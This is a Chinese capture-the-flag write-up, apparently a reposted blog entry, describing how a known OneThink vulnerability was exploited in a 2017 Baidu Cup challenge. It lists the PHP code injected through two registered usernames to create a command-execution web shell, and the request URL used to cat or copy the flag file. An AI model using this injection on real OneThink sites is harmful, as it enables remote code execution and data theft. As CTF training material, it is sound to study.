“百度杯”CTF比赛 2017 二月场_onthink

本文介绍了一个onethink框架的已知漏洞利用过程。通过构造特殊用户名绕过限制,并结合burp工具修改请求包,成功获取服务器上的flag文件。在遭遇权限障碍时,采用复制而非读取的方式解决了问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目在i春秋ctf训练营中能找到,这题直接拿大佬的wp来充数

 

百度找到onethinnk的一个漏洞。

 

参考:http://www.hackdig.com/06/hack-36510.htm

 

就是注册个账号为:

 

%250a%24a%3d%24_GET%5ba%5d%3b%2f%2f%250aecho+%60%24a%60%3b%2f%2f的账号, 但因为账号长度有限制。所以分别两个来注册

 

账号一:%0a$a=$_GET[a];//

 

账号二:%0aecho `$a`;//

 

用burp来改包,不然会失败。

 

依次登入,也要用burp来改包登入。

 

然后访问/Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php

 

查找下flag位置 cat就行了。

 

/Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php?a=cat ../../flag.php

前面几步照着wp来完全没毛病,直到最后一步的时候卡住了

于是开始自己尝试

首先确定了该文件夹其他文件

试着去打开其他文件,发现别的文件都可以cat,只有flag.php不行,猜测这个文件设置了权限

 

不让我读还能不让我复制啊咋地,执行一下复制命令试试

 

回到刚才的目录下面一瞅

成功的复制过来了,直接访问flag.txt就能看到flag啦

 

转载于:https://www.cnblogs.com/Ragd0ll/p/8734841.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值